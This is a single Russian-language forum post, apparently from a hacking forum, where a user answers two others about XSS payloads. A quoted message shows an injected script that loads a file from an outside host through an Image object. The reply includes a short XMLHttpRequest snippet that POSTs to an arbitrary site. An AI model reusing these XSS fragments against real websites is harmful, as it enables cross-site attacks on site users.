Показать сообщение отдельно

  #13  
Старый 11.04.2016, 17:52
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от bazaWT  

В XSS вставляю скрипт в таком виде img= new Image();img.src="
http://bldfdfdd.125mb.com/22.js
" . Может проблемма в src ?
Это шутка? Почему картинка должна исполняться как скрипт?

Цитата:
Сообщение от blackbox  

В вики по-другому написано:
Произвольные заголовки запрещены. Обычный POST/GET с дефолтными заголовками отправляется.

Код:
var x = new XMLHttpRequest();
x.open('POST', 'http://anysite/', true);
x.send('param=value');
 
Ответить с цитированием